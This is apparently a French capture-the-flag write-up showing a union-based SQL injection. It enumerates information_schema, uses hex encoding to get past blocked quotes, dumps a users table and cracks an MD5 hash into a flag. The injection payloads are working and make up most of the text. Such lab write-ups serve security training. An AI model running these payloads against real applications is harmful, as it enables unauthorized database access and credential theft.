INFORMATION_SCHEMA -> donne accès aux métadonnées sur les ensembles de données, tables et vues.

INFORMATION_SCHEMA.TABLES -> récupérer données sur les tables et les vues de la BDD.

id=1 or 1=1 union select null, table_name from information_schema.tables

--> users

pour éviter d'avoir a mettre les quotes qui ont été bloquées par la db dans la requête, on utilise de l'hexadécimal. users -> 0x7573657273

id=1 or 1=1 union select null, column_name from information_schema.columns where table_name = 0x7573657273

--> user_id, first_name, last_name, town, country, planet, commentaire, countersign

id=1 or 1=1 union select commentaire, countersign from users

--> "First name: Decrypt this password -> then lower all the char. Sh256 on it and it's good !
Surname : 5ff9d0165b4f92b14994e5c685cdce28"

5ff9d0165b4f92b14994e5c685cdce28 -> FortyTwo -> fortytwo -> 10a16d834f9b1e4068b25c4c46fe0284e99e44dceaf08098fc83925ba6310ff5


flag : 10a16d834f9b1e4068b25c4c46fe0284e99e44dceaf08098fc83925ba6310ff5